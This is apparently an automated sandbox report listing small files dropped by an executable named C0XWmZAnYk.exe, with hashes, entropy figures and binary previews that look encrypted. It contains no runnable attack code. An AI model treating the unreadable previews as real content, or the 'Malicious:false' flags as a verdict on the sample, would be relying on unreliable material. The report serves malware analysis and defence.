              Preview:<?xmlw..iw.9./.,F:....;p...,P..~.:Ap>Q.$L]...b..>..{.a.x.BU.r.....M...z^.L.!..h.|..N........w...p."LvP7.%.z....K.~...4....m..]...^.. .d.[......v.....O)K@.T8...8.k.u.0....^....=.:.@..h..)!.G".....+kl~....p..Q....b..*.......l...`8|P....&.U...x=N...Px.1.v..'&$^...c..~..k..GG3W' (/....).8.3u..f.........+.......Z...!ry;..c2?..Aw.g.U..<..c...D.O..'&t....P........<..r..e'.h.D.4]...I....t..@kS.........6.v.8..O...;.B......U.vx...m......1..........F.R..g.B.9....}p.IM..U]~.CU...f4...,.......+.!U[.....y)..S..P.hj.O.."..l...vJ........9..f.a.-.y.pf..>...... ....w.B.L..Y.P..L.@zU.0......O....w[8.q...Z...........L....Si........hp....2o..'..Vp..Vw.4XR8......NLS...j.C.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1699
              Entropy (8bit):7.880207441164535
              Encrypted:false
              SSDEEP:48:rNWycxVaoGv23BKHJCFDIRpbBcVvrwHK8D:rHcJxKhLdYvI
              MD5:AD47A493EC4EC4F8520AC1E776AF1633
              SHA1:6D57ED220FCFE0440C739240CF16A3B07787A86E
              SHA-256:739FA818CA5DEB813E657C71FB8F686C616FE9A99D0DB0FC5611D9094B553390
              SHA-512:EF7EBB0A394AF8247BF42F9562E17B161AEB2B59F139A778B357A746EAAC9CCA1C424F1678385064B131CB95FB1C0777934EAF9DC68CF9B8A06F4BC9CE2939EC
              Malicious:false
              Preview:<?xml$B.#H+n..X.4h.+B|..$k../9)...O..e..!O..^..3..9M....cQbt|.P....GgK.......v<......^Di)F.........Xi<.%.V*.+e..%...M..1...iR...;..-X(....\m/..sG.-......X..RU:h.c..t.9B...;+.4vv..R.[.;.|A........l..;..p`...X....[..-...f Be@. ..r...I.b../.O..xK,..%*..\.?w..m.2).&..&O..c.n.S..f....0fV.[.....>.m...5Cs.B..:K...F.Eo|1O.eX....V..4.-6.....=.A.ev..a.T.M.1:...8.k..4N..J/,..>...UU2.*.ls_..2.Rr.w./...8...<.....pXs7.".0..)..(w.6../....*+.:{@....!>'..v~T-e...x.K..I,..1W.......lZ.T...~....T."|...W.........!..].b..N..DU....{V:.r.tf.....".w...a^[....(..1.....\hd8...a..3.@x&..g2......t.Z.`G..3".....HFo.dE'6.4.R..yfp...A.)...c1.Zy.).o...:....e.5.Z...$J.*.>....J.c.."g.X.R...8..GW.l4..o..%.K.F..0.e`."6W.Bo...*....._..c7N.......+.H..XM.=?q.sc^....L:..x....c;.T.'..g.`-..aX....._0......6.p....2.].m..+.v........tS.)P8.....raG>aN..YK.wQl\9D.Q^.h.U.L.(P.t>a.*r...}...?1*...x..../.T...k.A..^.3dX.....k`.h.".M....z.fr.D.7.......... I>.....w...@../.4..&.H.....7..=Z...S.....M..<.d
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1736
              Entropy (8bit):7.886211348229546
              Encrypted:false
              SSDEEP:24:KsNpKXb2O6BSCu4f4NZjg4ys69K99e0xO1dsAskPHGnpe9Mmbo+CcO7nP/ZZ2DLy:KsNpMZnJ4gXRwKGuzm9MSCcinP/7CR8D
              MD5:D1BAABACDFEADFCAFEC4CE1E573A59D6
              SHA1:06C1EDEBF299EC1ECF8B08ED2910C5388FE08A47
              SHA-256:25D59A10A6EC69DB14A7C4C73308B5949008AE61EFA74FC9D0638C14479A3EA9
              SHA-512:984401D6A6168474AB7C12FC66066DD7BA12170C5EC07BE6F8EACFF0A605CB1B583FAD8C71F7D93F066AF5A2CA91766EA55119A63B9544CBDE859C8EEBF82CB6
              Malicious:false
              Preview:<?xml.l..c....[...)..y3.].o...k.A,w.m.`H.R,.,@7...^..\.G..p...a..?>.l...!.".c.v../.....>........"9.0....(.,-...||..S..X..1.0A....<.?.N+....}.j....q..?.}..18bS.@A.....t%*..3....C...I.c-..../...O.v........v.....o.>C.z..O#.ya.K.VG......#.cK..4.^.....OtM.9.b.P>5...Y..O....<[9....u....F.....{1..F..T.H.xU%..{.D.x..H...(.......S...s< 5..AS.=.0C].L.F........{.jm.+.+^...fm....JZ...nnnq.A.r...$.8..b26....,......nX.}.S.W3x...Q..]...Js....2..........;?....p{...I29..`69.C........|.i.....F...$.|..7.\...DK.(,.kmzu.<.2......\`..o3.......2..U...'.w...w..#=.#..[..T....E$F>.....x-..X...,K4.b.M..,eb.......%.1.p.jr..r..{wl.N..5s.C+..$...].\.....\D5...97.T.3..Hp..q...M......Q;..i.eP.[.^MX.7.).....{.....J.o.s...R(....|<..r.....s..Y.{.YZ>......X*c%.........&....).6..F...N..sn.Cx.....0e..+.....s..[.X{.....F........H^..Nyd........Js<p./.n....e.{l.G......$}t.Q.3...JGZ{v%.F.a..7...j.6?0.V......?......A.|.V.y.R.y...|0..b.#E[.#...0.8..}e..5$I.X.N%X.+..S'Uf.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1689
              Entropy (8bit):7.89270872566196
              Encrypted:false
              SSDEEP:48:ZrAm4FjLl7zrpqK0V80l9IGfpyTMjNQ/k2088D:WxBnDYIGHZwj0B
              MD5:0D5545164B16CE6B5014C744AE88DCB8
              SHA1:E9C43308B85FDB87CE95333A9A02386A10036869
              SHA-256:9128E1B4EFA2E4A47E90DB7CBBA931A1D66EC5929202C24923DE52928D557C56
              SHA-512:8880621E0CA90058F6C9B8BCB2A851087239CB2F8D75CB6866D51C2AA730B3A2C6EC99A6A19B5B7D488669780D1948849E623C904F45BCC17FB4687125E2AC75
              Malicious:false
              Preview:<?xml..g.K..."..t.r.B.2#....p...p P.X.#......[t....P..]..s.Z1 .F1..a.g{...Y#)..{A.EM,.4.!......F+.V....%/.j..U,.*#d,EY~....."M...r...\....O....|[..L..S..WNb0....c02g...y\.....?....S..s.|P....e-e.....g.....l.@tT.f7GZMl_'..........6E.yP.......F6.y...Y..s......T.R.......4..M.3D.v./.....l...y. W*G..|].+,..L...A.&..z.....].%.....i..RT.,...O..?...`y.yR.^...T..E..w.(Y|. Z%...:..k`$B...L=..K.`..I.>a......4...|.......V_.!Q...M.k....ZikA.@.?...T..P...".8.j..!..4..F+.!....eG...V..t9p..O.b.....w.............pk...2....".z...B6.....>...|.W*Mc?R.M..G.wUm..5u.k~M.f..6..8..3N... .{?/..r...A.wC@i...uz....M.......J..Q_.J...bi.z3H...:...3...F+@w.;S.`.[...|hO2.i(>.c..2.K...`]...iA..A.a...BY..{=".".S..q..,.TP.....p....g;.G%.I?.?#y...~u<...Ho}.._OK.h..OA......G..l{"..(y.[. .|S....&*.K..q...x.&.....v.6..pR.q+n@.r.y...D.n..FV.F.%.u]....tP.aY..N.n..@j..WAk....J.}......#.V+4.....zF.T..<.DT...H......IP.?.?w&Q.#...S.18..].....[...d=..9.z..=...(..O.)L...............(S}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1726
              Entropy (8bit):7.88883877867508
              Encrypted:false
              SSDEEP:24:zVvCV5QbpT4+vf2ZR4c1e7LkwyEpbZkCyrEOdK6RDyGMTo+gxG7pNek7iQepwsd4:QV2bVXKVKLkre4JzMGWobxG7nekm3F8D
              MD5:06FA97B49CAB718CDBC9B122376EF004
              SHA1:D12F86D918C2653122CDB6334180F007B59EDF7D
              SHA-256:E04A47A0480669CFB8708D37CBBBAB3B4722AA037192B6C6A594DAFA2A5B366F
              SHA-512:A6AA9C74711E9B81C678B2B93AA8B81392960F8FC7231727341FFBD5EF891EF34AA0159BFE8AEB77B1188A6372D85E62FBE7EF0E4757002E12B537CAC618EB47
              Malicious:false
              Preview:<?xml....B.PZ.C....h..Z...T:...<..q..#&!4.sS.[P..p.&0.....f.i.......'w.W9.C..o%cH...5.w9.!wY|.P...a....%...~.=9....Wz./._nE..2a...e.n,.L%A.t......}...`.5..>[(.R8.K........6..y..!..6....{.b.|....1.....=!.q....ps....m[.&..'.n..zI..2I.M...a....g..wj.z/..qUx...A.l..M.....E.*...gL....../...Y......V..K.J .*e.z.....@...\.l.9..i...V$.....,..d[....Z....>Y...p....C...`.#1..|..YD(?cMZT.2.A<05.N.N.H...........h.N...8....._.....9jo.uA....Yim.|k@.(..:........Z.(.i0&q...?.'..^.2.6....c.X.B....)..jN>~.!aL0y..|.*Z... {=..r*s...HH...&..5..;I..L-..l..R.v.lN.z..C....%;.}..P....+.^...........x.W..4......7.{.u .{.P...@.rn.a8b)f.....E.Q9...-...b.d.K?.9..K..*..U..........VMr#/..L...).a.."....!._.l=..2.$q.53..D.%.e...J....$..)3[.[Su.....w6....!..1.j.......J:.P.g.75Y...K$E.I3..6s...+.....6...3.2..p...%..@.+!&n:xm.....F=a.i.B.iF|TC..D.,..p....T.c....6,.P6.}E....\..krW@...........<.l...L..."i...8.:...../BL.;Zu.:..4.R.....)..`..?.....~.2.U(....gY.$.t...
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1701
              Entropy (8bit):7.900206484170512
              Encrypted:false
              SSDEEP:48:ExI43sc/euCiaMuJkoPWwvqcNlhbflHmXs9R7eJ1ShOzI8D:Mn/Ciat/ZqcRflGX67e2hkF
              MD5:C67EC540345B4768CCC2F7B6157608BF
              SHA1:46C1738D9C44699B7D633870297883113C430D57
              SHA-256:3EE7C1DABAC590A70C6419D10147682268DD0DB497582325C2287842BEB1C053
              SHA-512:372FE78C258DB3CACDA3796A24CBC796D2416EFDBDFB58CDF9F02178C027A3E3860B9AD0D307A09F334D8CEC297DE9D479E824021AF2FCCC6DC795B56B08474C
              Malicious:false
              Preview:<?xml..`..(hK....gu..v..9.5/.]%...$..N.V.. ..i.........l......(.&.EY:d.xr...GL....#.(.W\...$.1.:[..R..2.yG.>`..B_.,.xJ....d.PiK.ed.....)L.L.6.b.f.'.....I....Y7........G.f.,}....f.~..NI..k.).....y. &.y.g...3.r(....I..0.1j6ORB."c`p.[...e.b..Z.t......]..2..e.....?>.LyP..9.....(b.;.. ..b.G..h I.rH..g8Y@.S.o.@;....j.eZ!(.....%P.PNA).rH.....S0...i.Z.........e..[..C..A..N..Uu.v2pZ.x..y...hE=...k8.9...@.&lbu".f%.V.*>.2....|.=.5....t%.v..4...S.."<.#.w3w0I...QZ..r..].F.........q.Q.T.Y.7$v..U<.`.NA..l.........A.C..........(...~<(../<..$.....N.3.7.s..c..).v..]......~.E.o.d.zaK.Ho.L,l.......J.........E..IO.d.._..VMw..F..._9.4r....$....AjN.<...._X1.<.^.~.5.5....*?.2.Q<...o.g..d@H.k...-..i...f.......c.bm*...9........ZE_....[.....b.Y.:.x.....II....wz..-.G.4..p.o...jw.....V..+<..[...IK._....T4=....i..~<......{g>}.....c*a."...0.....H.9r.c3.......23.4.....p.Y\k....2[..~H....6e.......{@...`..y..:N.'.?;......l.Z.....<..^Y...../Z..DC.t....W~D6..Z....O.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1738
              Entropy (8bit):7.880430181868437
              Encrypted:false
              SSDEEP:48:gWENhlQpD7RkWVB13H61BY0RQNzMIujNgNnwMW8D:cVQx7R5B1K1OxxiKNnwMP
              MD5:3019E8AE27E0B7E985255583D59F8B5A
              SHA1:3AD17303BA2ACA575E762D642711A12EA1B30435
              SHA-256:CDC6B8BCF83624321020CF0CC9D0B5F6C97D20435076EDE75ADA10C45F128430
              SHA-512:8E4FE9FB2A3ABCC77D63756A307214CF6D812EAC555968E14E48B605DB8163785D619997F5039ACA842FDE42A44F0B4CFBD5886A194D9A9C15C85653EA42464F
              Malicious:false
              Preview:<?xml....B.?0b.J.e..uf[....).....zm}.JM:A.R?.S.........._.q..s....*.4..TwdsDH..A`.s.B.Z.i....L.>...ztK>.....3.?...(e..o.pi..........je.C...?...nj......>$......a...2.>?p....:...!...o2.v...Qz.2O.C.9gf../RFV....a....$.q...f.CB.p..hM..5.>mt..9K$v,oz..a...:.N.}....(..W...}..c)7;U]. .%J..`.W#.+..p......(..Cl.F.F,J.T.D......xx_....jU.=2....5{....7.........J...J.V.......z...._5M...3[....,......*.w..G.).c.Ev.....y....}.=w....(..7...`...Q3f...pd....[.xGn.lm.q.]..]|...yS.Of.).Z?'RR.b.$JTB`.5.77..^<.=~.N...o..<......JN.u.......e...{....EG..d7.9.....D..~..d.....^.Ky|.....%<...o.?..-...A.dC.........&..-I..w%...F...9.#QY.'+...;A.B..d.. ..[....nW2...+.hn ..3.x....../@......E..E/U....C\;%...L.[...............B.>.!....`.]H5>.....j............Q.....B...}.Ll........b......!...7..V.\.-.r..b.B.;5.IO.R....ne.xi.....#.^4<..<..P.'H20.)....QWy..ws.hK.`..i.(S.DY].T.....S8...#.>E.IE..:3....!e...a7-.2llH0..B.v...^.|1V...PzC..p$8..(l.]k.j..f.F=..'.....E.J&...ZW.q.`..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1689
              Entropy (8bit):7.871974595333108
              Encrypted:false
              SSDEEP:48:SyTn8p79ZL1bwUnJIQLLVMzJn7op/RnQAh0G9S1xBS4JpJg8D:SyTn69ZL2kNY17oZRnQi00YxBjhN
              MD5:96F7078703D9D289DBA2C60C7C2EBACC
              SHA1:6B21A35261EC4D1533E6D3CD2550A4A357FC761A
              SHA-256:A3EED93712EEEDC342E93D375B84354492F181BE070DAB0DC46E5FC8109EF609
              SHA-512:B7407D7CB9AF46CD8799A6F93E4E218640A84D05F6A95F087E11EEF544B03A17445DF145F1225FBD56A1673480AA7680FC3E8E7B80E34D26409F641E3851A9D5
              Malicious:false
              Preview:<?xml..!.....1..+.wi...".r^..B.. ..Q.{J)....D_h.q.j-..k...4.N.K..m.fkDv.Z..p.2.~[{{.D......_1&. $.lu.q.[..c......n...d.......:..ps..+.Z....S..W...`M.}\./;>...`.f._n2..x>0.Q.$......!*q.>.....6..z.(..a..y.t.%......S.A....n..>2....5........B.p."N.=@.J.d......O.Y..5....8....*..C..(.q..u.dkC.:......^...r....3....*.!p......1O(...^..|.$,..Y.0#....|....O..b$.}....:.M...nN.%u.\..}Q...V..?.}.$.E..V...z.g....M...OKT.f.......%....0[.S-..;1.......g.1z..G.@..\V.W.DC.\E.f.S....#..l.g...$qct1.....J..n.P.#...E..M......=.f....Y5.Y.......1,....%)J....{.D...<...I6.G...1/ j..g...&...}.........l..i...8#..":....j.`.V]hf...j.Z...&......I.9n ..@p..R8......o....5..h+....2...1.Ou.).-d.<J..^;_....2.q.._.=... ..I`.c..6...-..}.+.:u..%k.l.]pQ.a.......u..d.;.Kt....:...KL..L..1^+.._..%3.i.u....(..l.}.S.>.-o...a..4....5..M..a..i.<.t...&.fq.@.M.....!q.%U.w...._9|e..c.._+.+~./.o..f...:D/.?.T..t6.....u.2..$.J/...t.......C....A..'.~.....Q.w$...3..6rw+hL...Q/35>.h..S....x..~.`...
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1726
              Entropy (8bit):7.870442274293754
              Encrypted:false
              SSDEEP:48:2VaeCZv2TvbKsRArilUjD1cLE/WHNHNR/CU/n8D:beUv23lGDCL/2I4
              MD5:3AB2C39CE4C88223633C100824D620E4
              SHA1:F253FB9B3F06BFEE7E6D7A7F8A928D53B0AA6F6F
              SHA-256:346D25BB01868A9E24FC063F0C7A743A8586C23F44309B5DADB0981CA11B130C
              SHA-512:A34F611E5501BA5767D8EBC58D176CCACEB601E4DA5F9252F7F23E09894C5F1884C0BBAB389E47DDC79F33CDEB465B89E3D8A04B5009C032FB9208ED229285DA
              Malicious:false
              Preview:<?xml.5..D.X.?W...@.7..I...?.......}Xx|........J~..~4..yG./.....2.H>...|...-%......<.K.....#0.T...cx..W.$......h6..u......x.={r.....t..).9.QA1.y._N...x....4..Od.0...j.;p)...F...4...4...Z7;..W.U..b.<.6.....8..j.U.BP..F...h..g.J\...... .%..s.`.....C.N...cuo8U.T9.'.C7$...=....8<.A...M9G..i".t.cj........%=j.....i/G....I7V.2.....%7P:....Hku'...3..~.0b..._..>.d...?wor...c...I..<.e6......e..y>.s&a..!=6_-./...}.....0..9c)..g.B.^........f..<....bp.r.Mh.S..G.!7%..%.s.Z..3...H.gz...!.}..<....wj..&..... ..0.\u^m.,.^\..IF{1...:m..!R.~6.J...Z.0....?.L..}..L~...D../2..Sr.i.......2.....o..j,".Dga..L=....A....v."\..n3...y...-.....sr.@....Gi..G....Z..%..E..H.."j[S.. .gbi...Y.k.9....H......Ph...-....|..}... ...P...6X.. .Z..3...2..2..L...Ja5.......%Am...d........k...........{C..&BEh..'.O.._...Z....d.>........s...e?...vH.8i......^.**kP_.bv.w4G...r_...|.>*.d......Uy...\'..ju...=.-K.Pm..q%m(.O.?.?..hAB.b..I.s..9..:.....j.]I...w./U?Jv.....i.6.9...R.V...t..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1697
              Entropy (8bit):7.883591778620271
              Encrypted:false
              SSDEEP:24:sPsHdymDM32NE4Wv+dkYTWHJPVuuCR4dyYcUy+uPg8GiP6LvTvQTNd5cmAlIed+X:1smlNElSxapNuNidRWLjEv2gln8D
              MD5:4F911980C0C2247D6C358B5C54BFDC09
              SHA1:CB35C72FAB743073573456DAF019106C68B2B8F6
              SHA-256:CBF859F44E263F9C0CEF8F9EC815DA104088A0906F39AFB384B638581813894C
              SHA-512:3DBBBCF3F93EAC7049ED40F99026DF7497883EC7EA3D21217D531BCD82257BFFE0B1EFAE13890AF528F13C76D7391296F35966A147CA3604355C0B60EB6AC53F
              Malicious:false
              Preview:<?xml..}. <......Px.dN)0.....w...C..pz..q[|.fJM...V... .!>I.9.)...0..........X...u5..\h\....oF....$H|1.......x.J....2~j5<..G1..Ye....Q..fs..{.\l.D.d.e.Z^.v......wDC$.]..@U...x.]y........8...H....,+.]b...kB..ni.#N.A.l......2.&}..n.*..u....F.....].. .....9c...$.....]."I.L....w..0..<.S.=....?.(...,L.>.-..NMA\M.Ds._;..+?...*...8T.aO.s.40.....7aXs.HQ....; .L.Kq.@..hc!z.?.q..=.G...g...\....8...=..G.@..../.........b..3U......].f.&.Xp.FKBf.9.1....l...C...vm6..o........N|...va.|....L..2..N...+...B.<..s:- ....C%.g.......L .S.R|....(...M.s.C.._..M#.(..........r...|......*^.w.{<.3.....>.......p..P.......h.`U.G...........b....?...2.B....k...4...jb.O...S$+..`...5RC..C.Q....O,....]\.\i/...P.a.~.L9k.Y.......t..p....W.`/.:...F.M....?q.jx.&Y=.)....w#.XB"..J..5..WN.kg.7.'$.(1k..Y.....g.o...D>.~.vo.*......r..z...?.|..}..zK....K........."A.3.:E....P.....]..|`.\-iVW.z..&4.)?..N$58...y.....L.29..1.0.a...nj..S.PE.mA........GPWW.....R.u..1.:..a$^.....>..m..F..I$.K
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1734
              Entropy (8bit):7.895621973030574
              Encrypted:false
              SSDEEP:48:UOR062NJT9LCUDFA/zXDL1IC4KopGUl18D:hl2Nzusir+pK+U
              MD5:770AF7F15405324040D128DE5E4AF2AB
              SHA1:3670D68B8C9355F1E418BC5FEB9D5FEC01B7DFEE
              SHA-256:832568214303E4A7B57CDDDA1EABE3625BBD6A035456736D623B32E5499F0169
              SHA-512:D1BC7A53DF92326C9D2EF43095A166713490A20F3E1EED4B8AB764214AE5670D87EA3FE916A087BFF78AE581BB66ACEBA4C46324594855CE54438FF1ED61E85B
              Malicious:false
              Preview:<?xml.9..82..?..s..4.m...fS.ak"D.>.O.......~."..Uy..A.w.V.l..UIs..r`(^.I....rO.X.#..../4.X.Pl0Q.mZG..p.3.c.)U..........*.nU\..!....C...C..(........e..4.M....1p....a..i..*..p"F|......&M..7.s..lM......k......*......... .....p.....t.Q.L........:......y....J .7..RDq7T.`..g...De.U.C..\)B..7...Z......B:L...B74u..t.\I[4...H5.H....d..c.M.Q#..d.e.q.*@..u.,....F/..p......!.<......_r.X.1..L7..>.6..4..,..Z..........)c6wPN&.].o.u.z.R.....W..C....my.0...x...E..i.A...%MM.q.;.Y.....q...y.J..e.....1.......w!GE...@....Xm..~.m......cy.^....D...m.N....Q...."..{.'.gv...t|.A'(.%....sq..m..o.[.[r*..t.P2..\.v...qna..]4.^...W...8....Bx@.H..'.[i...S.....B.T2.....L..._<~,...|.G.#.R...2.#....9..g......st...+e.O...U....yS|K.H..?x.`..FwDR......R..(..~8.O..dq.D.=..=t...M%..31...$..+....*j..e7b...z)...T...K.30X|...!.$u..l4F$....%...C...Wl...u....B.k.\......}\..8.....az.^..@..WO...Zb.sC.."D#-.G..K...d..0t.l..K..a.)....@[H=.Y...:.w..'ss4.8>.Z=...&.......4V..?.T%`.....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1695
              Entropy (8bit):7.869860514762712
              Encrypted:false
              SSDEEP:48:ynCNzuQkklGqISLiS2ovU6h5xMBjnaa175iHh8D:oCNVk43LiivDxM1a+N
              MD5:79CFD22F689928E32B358E8BD7FA638A
              SHA1:CE6D946C206CDB1249EADD3CBAD332D37765710B
              SHA-256:2C7937DE69600DD3F73CB11D1F939A2EDB49246D865782728BBECDCE7D5AB92E
              SHA-512:48EA34AACC67A40CA749F888F4E0F8171254AE9B0152B1ABDC4DB7431B1CEED661BFAA30C14F91FAF71CDB57E5B1BE805E2A2031AFB822A5F9EFAA5785597302
              Malicious:false
              Preview:<?xml..&e............H.{."e.-.xZ...@.E|k.2])O.?<ZB}.iN..8....4J...nH.Z....".e?..R.v...f...{2.n.1.U.N..GvNo...5.c..KEHZF...j.......1...|......I.V\~i...u...=E]....0...Z=..I.........u.p.C..<...\.....\Z<.........GHW.?8.gK..:@...@._....P...S....V..p....Lv9.~..q..N.."".b....o...#.).L{"6.X....LN.p..........J.D~..q..i~.2)XjL....uL..j.H...0..x....u..l)]..x6.c.B...)..|...72bi.....X..u<U..l.^R!.*M.!....e..L..4d.g._....Xy......T.~Zd.rYud..(.y.F.by.....].m.q..+.S..|...H.b 5mM1..=..N.tO...>...G.o.H`.b.....o1.....!......B.`...^.3.\..BP.<i...~.D...6.+....V.!5w.R.23..#$.B7..z....e&..Y..q)c...R]..R...Z.|-.....7O..+.U..S.A..S.~,y.M..2....1,G.1.\.M.5...L..'1z.........~.m.^.j.|)..y.........E[...3.....kZ.....y.nA_D.....g..g..9...--..}....y.4n..C.......T....dr..p..c}.wv.d`.4...#.4...^k.0...C.dZ.GA.......I..V.....c..Z3...3..h......|s.[_..^..o.&......oi.eN...i.9F...p]..y.X%..@0..A....|.... q...I..%....c.X...A..\Z....9....P....Uem.u...z.+4.. ..S.n.P.j...s....P
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1732
              Entropy (8bit):7.881666016209865
              Encrypted:false
              SSDEEP:48:5vh66MEajdoqubkPY7GQ3C8KhQY93PlSic4CsN08D:5v07nbZ3dK4CsNp
              MD5:E2B9B7388E606C055F5A9D1EE659E227
              SHA1:AB0360B44CC9693065A947E29E0703EF3257B607
              SHA-256:305E0D80928FB705AE10A120D4AEB51436135F2FD5AF96A6A720469B8E29195C
              SHA-512:73FFF772AE8AECC4EF7E5240034A68649244AD7197985F87F719BF35B43E197802DD0F22C34F95448677C82A0469F25507C0FEFDE11E6279BD43201EEDC4A01D
              Malicious:false
              Preview:<?xml...........9.YQ.(..3hq}mh...q]b..6$.|y`...t'g-o .W.k....qJ.D.&YyM.:....R..@...f..J.8.BL(!..h..&9m.iu...F.E..WIe..'C.g.....2.Ia6N{XK.a........pTw..nf.f.F.+...^.h.,.T=.r..0....6en....?..!U.v..kO.... .....A....R0h.,..E.[S.jJ"? .5.....z.....[.Xl..X...u^1..C...\...X..][...j.c?....$bu.N.5.y$g`....{.j_.....z.h.iwM.C.<.1..Sj.y..#)....sF.....-..55O......~....7.k.d.YA<^P4.n...........N......zc..x....ruehQ`0V..|.HV.Lq...m6...aL.rB..`V5..%?l.....e...g...?{J..*...Q".j.m.\wh.o..km.........=...L........Q.4..6=..}.........OI!..0.F9....C...JvF..<Znn.m.........H...Zaa....E..Pl...o3.A....q...i...zX....H.z.s...K...Od...].H.....-=h........b......C.O.NyPs.d...C+<.V..a$..H./..1..j.o4.#} ..{....d..U".;..@/}(.....*Z.'...]I@......R.........iv.k...|...nG..9a.j.q#.&...l.1..!..931w...;.......h.......&...d;.9.I....4..i$k...c#.'..Fw....q.......~....}.t.Zt.M..R...Cv......xw2..O..%F...d.RP.-. |.c...\....[c.jY.f.......t.k.\.+...z.......aS.zF=..Q1.{.#|....m..q
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1697
              Entropy (8bit):7.873137122656699
              Encrypted:false
              SSDEEP:48:RZb+rpoz6JQpyCVxH+dXE0FLszSfXlR4gx8D:vz6JQpyRXEpSdSV
              MD5:EC26CC53F77565AABBAC0C7C5516A9BF
              SHA1:21A6F2E054DC3C5B0EBF5E66695B911AB63CCD75
              SHA-256:E35D2F4BC27AEC659F9D595FCD4ABFF104A7B085EE73B5FF71E40D46491EDB5C
              SHA-512:53976927DC64D76D56FF13BA18F3BB9023BD54CA4F382E46B86B618FE71D341B7FC902814E19BBB3AC0037EFAD40BFA692754A23B79D8A26E1FCBEC481224DBA
              Malicious:false
              Preview:<?xml.^...A.......B..t...d..|..azj....Kc.x..."3|...b..o..U......$...E.!O.iXk...gW.../..D1...fL....Hl.w.......F.Wv.!-..t....d7.0'I5g..H.1.tD9....>..../.._.8&?...l..m...bo.\........pP3.....Z!Q..9.S...l$b*..Q.b.i./C;Pb.^....t.R.}..<...8~...o.....j.|H.@..}9\M.<VG.JW..X..9r..5.I.)...,...{*B.4I..m..M.X..t..8...L....@i.g.}.[6..g9.......Wov.c.....]........7..O*Z.}...:..F....1.2.9.E.n..O;..$S..i..L.....;...F.MH.....5.....>i#b&^D.4.U....|U..Gt.-.W............].z6>D.0WS1,K^.q.#.N@3R....H.........G..)QaE,=3mx.7..6*....aA..l6.Pc"..ip......e..o_..m.,....i.k..~{.......F.......n#g..erlM<.....!..A6.....=..n....a....`..>1jc.X.../L.%.k^8...~Q....r]......0....F...u'{l.c.i.Y.xG.....n.].....0.d'.Cb.-dt.R.o.x.o8...R...aO%.H...;..._..;.Z..:Y.S..PcH....:,b..I~..9>^E./...?...K3.s?..|....3..-Cyg.<.....e......0.B.'.E.L|.T...zB.)..+_........}....,q!\=...g.#...]K.l.......C....9....,.m.doh.N.F..7.l.*..I&B...r'......r..F...{..Q.q..T......m.a.E..TnSr-.}}....W%.6.>M..O.C.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1734
              Entropy (8bit):7.885385495200814
              Encrypted:false
              SSDEEP:24:+9Hv8sriYj/iHn4B46pZB58Ud/fon4CkwdbZSNsJOMFHTUObX8wad+bD:E+54i6pv5Hd/Qn4dwdkNsJYObX8P8D
              MD5:F2BE32B8A2D06C3A8287EBD185EF4B1F
              SHA1:C10D37DDD88FF37CE6D26B49F3C6FCEA91783790
              SHA-256:530A941495FF13411162484AA712D08AFD10271BA31B250E46731B8A13C2A0C1
              SHA-512:E26AE309F246049B7ABF75E0144C663C60D87FD4D26295C8098A0A879371796CAEC67B7BF1E94E8834BDED053C1306FE184CF3693473ADC27E78CD8FECB4DF94
              Malicious:false
              Preview:<?xml4?vKZK.....B..N...q.._."..LJ.*.P.x...B.K.T.r%.......%.9|....)2K..ZA.......6:h.........^...:.dL.MM.m\/``........-......Ch.6,O..+^...>...... ...4pj...F.o.Y F.....KU.6.k0.....-.N!..z@ul.F..6...%;.%....p....]Q...{>~.M.2.&.`L!.d...8......4..f......a..fuh........{I..u..mP.|......t.[....C.=...O..?........A./&.\3|.B.W^;W;.R.V.....p.R.;...W..g^*.$....H.......|..}..f.MK.6.s..Iz$.W.a.)*#dD....Du,.:..{..).+8c....+..K..|o.W.v...!......v\.'.mRu..O.$."....0.._.....o.m...2A..j..~.|Kx.f.. ......^.p.d.S...Pax!.j.1r..p...Zva..h.I....P.l.NX....4.)g.F....W.....Y*..^..qq7B.~..d.Kn...:...Z.Ny.`...W.(B.|.j..._.........ci$pJ.0!zz|. ......>...Kg...w..9@.r..3..`... .Y;.i:..!.c.{3P........~.........Epcx.j.c.b...--.....UF.+...L?-.^..*zM...R..e3u.....\.LqJ...~N~..q..+.x|...V;......%..y.1dy..[6`,LWy.!...X. ......W4t-..V./l..h.......|...Ht?.$.@.3..F.F|.x..I...."...~ .C.......i.7j.<F...~\....E.&.3...Z...z.T...F..#.w...92...J.%..j...L.|g...I..1.!..G...Z.in..jA.f.u..h.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1710
              Entropy (8bit):7.8756421374177386
              Encrypted:false
              SSDEEP:48:GHhgGiqlRo5kIvSEfiIq+YMfGjp8FNUyd6uCDyS8D:whcyRo5hiz1MeWNIo
              MD5:C3310D37097D69A2611BA2AC97363593
              SHA1:393A6273D03E5B6EA58393C1D417FE6EC3A05599
              SHA-256:55D24F5AD802F26915A196D8C979984A95998192B02714CAFD3B3553E116FAE2
